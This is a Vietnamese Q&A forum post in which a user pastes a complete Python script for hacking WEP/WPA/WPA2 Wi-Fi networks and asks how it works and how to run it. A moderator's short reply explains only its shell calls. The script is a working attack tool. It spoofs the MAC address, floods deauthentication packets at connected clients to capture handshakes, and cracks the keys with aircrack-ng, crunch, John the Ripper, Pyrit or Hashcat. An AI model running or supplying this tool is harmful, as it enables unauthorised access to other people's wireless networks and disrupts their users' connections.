Hỏi đáp

Chia sẻ kiến thức, cùng nhau phát triển

giải thích nội dung code!

11:05 11-01-2018 462 lượt xem 2 bình luận 21:46 11-01-2018

Chào anh chị. hiện tại em có một đoạn mã  Tool DWH - WEP/WPA/WPA2 Hacking/Cracking script

Nhờ anh chị có thể xem qua và giải thích những gì anh chị hiểu về nó giúp em được không ạ:

để hiểu về nó cần những gì và muốn thực thi những dòng Code đó phải làm những gì? mong anh chị giúp đỡ ạ:

 

Code:

# Semi-automatic and simple (but working!) WEP/WPA/WPA2 Hacking script 
# External tools involved: Aircrack-ng pack, John the Ripper, Hashcat Ocl, Pyrit, Crunch, xterm.
# Author: Digital Gangster
# Before use it you may have to execute: "pip install termcolor"

#!/usr/bin/python
# -*- coding: utf-8 -*-
import os, sys, time
from termcolor import colored

def killctrl():
	os.system("airmon-ng check kill")

wlist = ""
print "\n+===========================================================================+"
print "| DWH - Simple (but working) WEP/WPA/WPA2 Hacking script           |"
print "| Author: Digital Gangster, https://twitter.com/digitalgangster        |"
print "| Usage: Just run it and let it head you :)                  |" 
print "+===========================================================================+\n"
time.sleep(1.5)

print "[*] Removing useless files..."
os.system("rm -rf capture* || true")
print "[*] Stopping (if existent) previous monitor modes..."
os.system("airmon-ng stop mon0 > dwhs_out.txt && rm dwhs_out.txt")
os.system("ifconfig mon0 down")
print "[*] Rising permissions...\n";
os.system("chmod 777 *")
print colored("[SUCCESS] OK, I am ready to start now! ;)\n", 'yellow')
os.system("airmon-ng")
inf = raw_input("Enter your network interface -> ")
print "[*] Spoofing MAC Address to hide your ass...\n"
cmd = "macchanger -r %s" %inf
os.system(cmd)
cmd = "airmon-ng start %s > processes.txt" %inf
os.system(cmd)
killctrl()
print "[WARNING] Press CTRL-C when you find the network you want to hack."
time.sleep(3)
os.system("airodump-ng mon0")
enc = raw_input("Enter the encryption of the network -> ")
bssid = raw_input("Enter the BSSID of the network you want to hack -> ")
ssid = raw_input("Enter the ESSID of the network you have chosen -> ")
ch = raw_input("Enter the channel on which the network is listening -> ")
cmd = "xterm -hold -e \"airodump-ng -w capture_file --bssid %s -c %s mon0\" &" %(bssid, ch)
os.system(cmd)

def client_send():
	client = raw_input("Enter the BSSID (STATION) of a client connected to the network -> ")
	cmd = "aireplay-ng -0 10 -a %s -c %s mon0" %(bssid, client)
 
	for count in range(1,15):
		os.system(cmd)

	print colored("[WARNING] Check if \"WPA Handshake\" appeared in the other shell. Otherwise it is useless to go on!\n", 'red')
	time.sleep(1)

# WPA/WPA2 Hacking
if(enc == "WPA" or enc == "WPA2" or enc == "wpa" or enc == "wpa2"): 
	retry = "y"
	while(retry == "y" or retry == "Y" or retry == "yes"):
		client_send()
		retry = raw_input("Do you want to try with another connected client? [necessary if handshake did not appear] (y/n) ")

	print "\n[*] Choose how to crack encrypted data: \n"
	print " 1) Wordlist"
	print " 2) BruteForce (Crunch with letters and numbers)"
	print " 3) JTR"
	print " 4) JTR+Pyrit" 
	print " 5) JTR+Aircrack"
	print " 6) Hashcat"
	choice = raw_input("\n -> ")

	if(choice == "1" or choice == "5" or choice == "6"):
		wlist = raw_input("\n[*] Enter your wordlist -> ") 

	if(choice == "1"):
		cmd = "aircrack-ng capture_file-01.cap -w ./%s" %wlist
	elif(choice == "2"):
		cmd = "crunch 8 20 abcdefghilmnopqrstuvwyxzkjABCDEFGHILMNOPQRSTUWYXZJ0123456789 | aircrack-ng -b %s capture_file-01.cap -w - -e %s" %(bssid, ssid)
	elif(choice == "3"):
		cmd = "john --incremental=all --stdout | aircrack-ng -b %s capture_file-01.cap -w - -e %s" %(bssid, ssid)
	elif(choice == "4"):
		cmd = "john --incremental=all --stdout | pyrit -r capture_file-01.cap -b %s -i - attack_passthrough" %(bssid)
	elif(choice == "5"):
		cmd = "john --stdout --wordlist=%s | aircrack-ng -b %s -e %s -w - capture_file-01.cap" %(wlist,bssid, ssid)
	else:
		os.system("aircrack-ng capture_file-01.cap -J hcfile")
		print colored("[WARNING] Hashcat module provides 3 different attacks. Stop the current one by yourself in case the previous one has been successfull.","red")
		time.sleep(2)
		print "[*] Using Hashcat Dictionary attack..."
		time.sleep(1)
		cmd = "hashcat -m 2500 hcfile.hccap %s" %wlist
		os.system(cmd) 
		time.sleep(1)
		print "\n[*] Using Hashcat Rule-based attack..."
		time.sleep(1)
		cmd = "hashcat -m 2500 -r rules/best64.rule hcfile.hccap %s" %wlist
		os.system(cmd)
		time.sleep(1)
		print "\n[*] Using Hashcat Brute-Force attack..."
		time.sleep(1)
		print """\n ?l = abcdefghijklmnopqrstuvwxyz
 ?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
 ?d = 0123456789
 ?s = space\"#$%&'()*+,-./:;<=>?@[\]^_`{|}~" 
 ?a = ?l?u?d?s
 ?b = 0x00 - 0xff\n"""
		brute = raw_input("Enter your bruteforce custom-charset (ex: ?l?d) -> ")
		string = ""
		found = False
		try:
			os.remove("dwhs_dec.txt")
		except:
			pass
		while(found is False): # This loop was implemented keeping in mind Hashcat 0.49. If you have Hashcat 0.50 you can use "--increment" flag and
							  # replace this piece of code. As you wish. 
			string = string + "?1"
			pwmin = len(string)/2
			print "..Using %s characters.." %pwmin 
			time.sleep(0.3)
			cmd = "hashcat -m 2500 -a 3 -n 32 --custom-charset1=%s --pw-min=%s hcfile.hccap %s -o dwhs_dec.txt" %(brute,pwmin,string) 
			os.system(cmd)
			with open('dwhs_dec.txt') as f:
				if(len(f.read()) > 0):
					found = True
	if(choice == "1" or choice == "2" or choice == "3" or choice == "4" or choice == "5"):
		os.system(cmd)

# WEP Hacking
else: 
	cmd = "aireplay-ng -1 0 -a %s mon0" %bssid
	os.system(cmd) # check if AUTH is OPN
	cmd = "xterm -hold -e \"aireplay-ng -3 -b %s mon0\" &" %bssid
	os.system(cmd)	
	cmd = "aireplay-ng -0 0 -a %s mon0" %bssid # it speeds up retrieving packets
	for count in range(1,7):
		os.system(cmd)	
	goon = raw_input("\n[WARNING] Wait until you got AT LEAST 30K packets, then press ENTER to go on...")
	cmd = "aircrack-ng capture_file-01.cap"
	os.system(cmd)

print "Bye ;-)\n"

# Digital Gangster [2016-04-02]

Bình luận

Để bình luận, bạn cần đăng nhập bằng tài khoản Howkteam.

Đăng nhập
Lê Châu Moderator, Author đã bình luận 14:06 11-01-2018

Mình học Python nhưng không nghiên cứu về hack nên chỉ nói mấy thứ vừa khả năng của mình. Đây là code Python trong đó có tương tác về hệ điều hành bằng cách gọi các câu lệnh Bash. Giống như trong code có ghi 

os.system("rm -rf capture* || true")

Code Python hình như chạy lệnh bash xóa toàn bộ thư mục mà tên có chứa 'capture'.

Ngoài các câu lệnh Bash còn có câu lệnh liên quan bên Network mà mình không rõ (mình không học về Network)

Nếu bạn muốn học cái này mình nghĩ bạn nên học Python cơ bản, hệ điều hành Linux, giao thức mạng...

 

Câu hỏi mới nhất